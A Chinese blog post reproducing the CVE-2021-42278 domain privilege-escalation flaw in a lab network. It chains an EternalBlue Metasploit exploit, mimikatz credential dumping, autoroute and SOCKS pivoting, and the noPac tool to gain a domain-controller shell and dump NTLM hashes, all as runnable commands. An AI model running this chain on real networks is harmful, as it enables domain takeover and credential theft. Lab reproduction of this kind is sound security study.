域内提权之CVE-2021-42278漏洞复现

已于 2024-03-08 13:05:32 修改
阅读量1.2k 收藏 6
点赞数
分类专栏: 漏洞复现及修复建议 文章标签: 安全 网络 网络安全
于 2022-11-21 18:39:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/laobanjiull/article/details/127970041
版权

关注WX:【小白SEC】查看更多内容……

本文仅为验证漏洞,在本地环境测试验证,无其它目的

前提说明

近期继续复现漏洞,本次复现域内提权漏洞,是一个老漏洞,需要一定的条件,写的不好,是自己学习的总结,大佬们看到了不要嘲笑略过就行,感谢。
此漏洞利用需要几个条件:

  1. 域控信息
  2. 已知的域内用户账号信息

CVE编号:

CVE-2021-42278

漏洞说明:

关于此域内提权漏洞的说明我就不啰嗦,我也可能说不明白,这里放上一个【Seebug Paper】发的文章,写的不错,有兴趣可以学习一下。https://paper.seebug.org/1904/

环境说明

在这里插入图片描述

本次模拟目标PC存在双网卡(外网+内网),外网网卡可直接通过kali攻击机进行访问,同时目标机在test.com域环境内,域内存在域控服务器。
攻击机:
● 系统:kali
● IP:192.168.100.6
目标PC:
● 系统:Windows7
● IP1:192.168.100.59
● IP2:10.0.10.6
域控服务器:
● IP:10.0.10.5

测试:

  1. 使用nmap扫描目标机网段是否存在漏洞,此处使用nmap进行漏洞探测,经过扫描发现192.168.100.59的主机存在【CVE-2017-0143】即【MS17010永恒之蓝】漏洞,开始准备下一步攻击:
nmap --script=vuln 192.168.100.0/24 -v

在这里插入图片描述

  1. 启用【Metasploit】工具,输入:search ms17-010查找ms17010漏洞利用模块:
    在这里插入图片描述

  2. 使用use exploit/windows/smb/ms17_010_eternalblue选择攻击模块,设置攻击目标为192.168.100.59:set RHOSTS 192.168.100.59
    在这里插入图片描述

  3. 输入命令:run进行攻击,成功获得【Meterpreter】:
    在这里插入图片描述

  4. 查看当前权限:getuid,此处直接是system权限,如果权限不够的话可以尝试getsystem进行提权,如下方第二张图:
    在这里插入图片描述
    在这里插入图片描述

  5. 调用msf的kiwi模块:load kiwi
    在这里插入图片描述

  6. 使用命令获取主机账号密码等:

kiwi_cmd privilege::debug
kiwi_cmd sekurlsa::logonpasswords

在这里插入图片描述

  1. 此刻已获取到本次需要的部分信息,还需要获取域控IP:
域主机:WIN-1TE9A61NRLD
域名:test.com
域内用户:ceshi	密码:test!@#123

  1. 在【Meterpreter】中输入shell,然后查询ip信息,但是此时返回的是乱码:
    在这里插入图片描述

  2. 可以输入:chcp 65001,再次查看IP:
    在这里插入图片描述

  3. 此时已获得我们提权所需要的所有信息,因为域控服务器还在内网,所以需要添加路由再使用代理进行攻击:

  4. 在【Meterpreter】窗口依次输入以下命令:

run get_local_subnets //查看网段
run autoroute -s 10.0.10.0/24
run autoroute -p //查看已添加的路由

在这里插入图片描述

  1. 输入【background】将【Meterpreter】后台运行:
    在这里插入图片描述

  2. 使用:use auxiliary/server/socks_proxy,调用socks代理模块,如果不需要专门设置什么密码等,就直接执行run即可:
    在这里插入图片描述

  3. 代理开启成功后,需要配置代理工具【proxychains4】,没有的话需要进行下载,kali中应该是自带了【proxychains4】工具,所以直接:echo "socks5 127.0.0.1 1080" >> /etc/proxychains4.conf,在文末添加:socks5 127.0.0.1 1080
    在这里插入图片描述

  4. 开始进行CVE-2021-42278漏洞攻击,需要下载一个工具,工具下载地址:https://github.com/cube0x0/noPac:

  5. 下载到kali后,进入目录

  6. 输入:proxychains python3 noPac.py -use-ldap test.com/ceshi:'test!@#123' -dc-ip 10.0.10.5 -shell可以进入域控主机执行命令:
    在这里插入图片描述

  7. 或者输入:proxychains python3 noPac.py -use-ldap test.com/ceshi:'test!@#123' -dc-ip 10.0.10.5 -dump -just-dc-ntlm获取hash:
    在这里插入图片描述

漏洞修复

可以参考Microsoft安全修复建议打上对应补丁即可:CVE-2021-42278、CVE-2021-42287

Acczdy
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2021-42287/CVE-2021-42278 Windows提权漏洞分析】
mingyqf的博客
04-14 3227
转发至:安全客 https://www.anquanke.com/post/id/263910 CVE-2021-42287/CVE-2021-42278 Windows提权漏洞分析 ​ 阅读量 76400 ​ 分享到:
CVE-2021-42278内权限提升
include_voidmain的博客
03-16 4946
0x01 漏洞背景 前些日子的靶场中涉及到了提权,当时刚好爆出CVE-2022-42278这个提权漏洞,正好下载下来了POC试了试,确实不错,于是打算看看这个只需一个用户,就能获取控权限的漏洞怎么回事,便有了这篇文章。 0x02 环境搭建 在这里搭建了一个简单的内网环境,主机AD_USER将445端口暴露在外,并且存在ms17_010,hacker通过AD_USER的445端口进入内,随后通过CVE-2021-42287拿下AD。 环境详情: 主机IP Hacker192.168.80.12
简单的内的提权
最新发布
m0_74326506的博客
07-11 1035
42287:微软规定一台机器的机器账号名以$结尾,但又没有做验证,所以一台机器叫dc的话,可以创建有着机器账户属性的dc账户44278:用dc账户向AS申请TGT票据后,然后去向TGS申请ST,在申请ST的时候删除dc这个账户,那么KDC在验证时就查不到dc这个账户,进而查到dc$这个账户,于是就将ST颁给dc¥这个账户。
CVE-2021-42278 & CVE-2021-42287提权漏洞
good good study
02-17 2818
2021 年 11 月 9 日,国外研究员在推特上发布了AD相关的 CVECVE-2021-42278 & CVE-2021-42287 ,两个漏洞组合可导致内普通用户权限提升至管权限。是一个安全绕过漏洞,允许通过修改机器账户的sAMAccountName属性来冒充控制器。与标准用户相比,机器账户的名字以$结尾,但AD并没有验证内机器账户中是否有$,导致机器账户可以被假冒。是影响Kerberos特权属性证书(PAC)的安全绕过漏洞,允许通过假冒控制器,使密钥分发中心KDC创建高权限票据。
Windows服务权限提升漏洞CVE-2021-42287, CVE-2021-42278
热门推荐
chaojixiaojingang
12-22 1万+
1.漏洞描述 Windows服务权限提升漏洞CVE-2021-42287, CVE-2021-42278)是由于Active Directory 服务没有进行适当的安全限制,导致可绕过安全限制进行权限提升。攻击者可利用该漏洞造成将内的普通用户权限提升到管理员权限等危害。 2.影响版本 CVE-2021-42287: Windows Server 2012 R2 (Server Core installation) Windows Server 2012 R2 Windows Serve
提权 (CVE-2021-42278 & CVE-2021-42287) 漏洞利用
Captain_RB的博客
07-03 2978
2021年11月,Microsoft 曝出了两个关于 Windows AD 提权漏洞CVE-2021-42278 & CVE-2021-42287,CVSS V3.1评分均为8.8,两个漏洞组合可导致内普通用户提升至管权限,文章主要对漏洞利用使用的两种自动化脚本进行介绍。...............
漏洞-CVE-2021-42287&42278复现
君行路的博客
12-16 1万+
文章目录环境介绍sam-the-admin python利用脚本noPac利用脚本利用流程1. 查询MAQ值2. 普通用户创建机器账户并清除SPN3. 重设机器名称4. 为机器账户请求TGT5. 再次更改机器账户的sAMAccountName6. 通过S4U2self协议向DC请求TGS票据参考链接 微信公众号:信安文摘 环境介绍 :god.org windows 7 192.168.52.143 机器名称:stu1 内普通用户:liukaifeng01:hongrisec@2021@ wind
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
CVE-2021-25646-Apache Druid漏洞POC.py
02-26
CVE-2021-25646-Apache Druid漏洞POC.py
永恒之蓝_CVE-2017-0143_漏洞复现/验证
18年开始,学2.5年编程(C、JAVA),学2.5年网络(RS、WLAN),现在来到2023年,转行网络安全。
03-06 1495
永恒之蓝CVE-2017-0143,漏洞验证/复现
CVE-2017-0143(远程溢出)漏洞复现
Ch_an_ger的博客
06-19 6449
一、漏洞原理 MS17-010漏洞出现在Windows SMB v1中的内核态函数srv!SrvOs2FeaListToNt在处理FEA(File Extended Attributes)转换时,在大非分页池(Large Non-Paged Kernel Pool)上存在缓冲区溢出。 函数srv!SrvOs2FeaListToNt在将FEA list转换成NTFEA(Windows NT FEA) list前会调用srv!SrvOs2FeaListSizeToNt去计算转换后的FEA lsit的大小,因计算
CVE-2017-0143
龙卷风摧毁停车场
03-13 511
漏洞出现在 Windows SMB v1 的内核态函数 srv!SrvOs2FeaListToNt 处理 FEA(File Extended Attributes) 转换时,在 Large Non-Paged Kernel Pool 上存在缓冲区溢出函数 srv!SrvOs2FeaListToNt 将 FEA list 转换成 NTFEA(Windows NT FEA) list 前调用 srv!
渗透漏洞
tomyyyyy
02-02 408
一、提权漏洞 (CVE-2021-42287和CVE-2021-42278) 1.1 漏洞介绍 1.1.1 CVE-2021-42278 主机账户的名称尾部应该有一个 $(即 sAMAccountName 属性),但是控对此属性并没有任何验证来确保是否带有 $,这允许攻击者模拟控主机账户。 1.1.2 CVE-2021-42287 在申请 ST(服务票据)时,首先需要出示TGT(票据授予...
Active Directory 服务权限提升漏洞(CVE-2022-26923)
做自己喜欢的事,并将其发挥到极致!
05-17 2807
文章目录声明一、漏洞描述二、影响范围三、Windows Active Directory (AD)四、Active Directory 证书服务五、环境配置六、漏洞复现七、修复方案八、参考链接 声明 本文章仅用于技术学习、安全研究。切勿用于非授权下渗透攻击行为,切记! 一、漏洞描述 Active Directory 权限提升漏洞 (CVE-2022-26923)允许低权限用户在安装了 Active Directory 证书服务 (AD CS) 服务器角色的默认 Active Directory 环境中
CVE-2022-26923提权漏洞
m0_46377671的博客
05-24 3144
CVE-2022-26923提权漏洞 参考链接: http://www.ctfiot.com/40081.html https://tryhackme.com/room/cve202226923 https://www.bilibili.com/video/BV1hL4y1F79y?spm_id_from=333.337.search-card.all.click 1.漏洞背景 Windows Active Directory (AD) 不仅用于身份和访问管理,还提供大量服务来帮助您运行和管理您的组织,其
CVE-2017-0143永恒之蓝复现
Welcome To Myon'Blog !
12-22 503
CVE-2017-0143永恒之蓝复现 漏洞复现 永恒之蓝 win7漏洞 kali渗透
RXDNFuse复现
05-01
RXDNFuse是一种用于绕过Windows用户账户控制(UAC)的技术,它可以使得普通用户获得管理员权限。这个技术是通过DLL注入来实现的。具体地说,它通过将恶意DLL注入到Windows系统进程中,并利用进程完整性级别低于管理员权限的漏洞,从而绕过UAC限制,获取系统管理员权限。 复现RXDNFuse技术需要具备一定的技术知识和实践经验。简单来说,复现RXDNFuse的过程包括以下几个步骤: 1. 寻找可注入的Windows系统进程; 2. 制作恶意DLL文件; 3. 利用工具或手动将恶意DLL注入到系统进程中; 4. 触发漏洞,使得恶意DLL被执行; 5. 获得管理员权限。 需要注意的是,复现RXDNFuse技术属于安全研究领,只能在合法授权和安全测试环境下进行。在未经授权的情况下使用该技术可能会触犯法律法规,造成不必要的后果。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值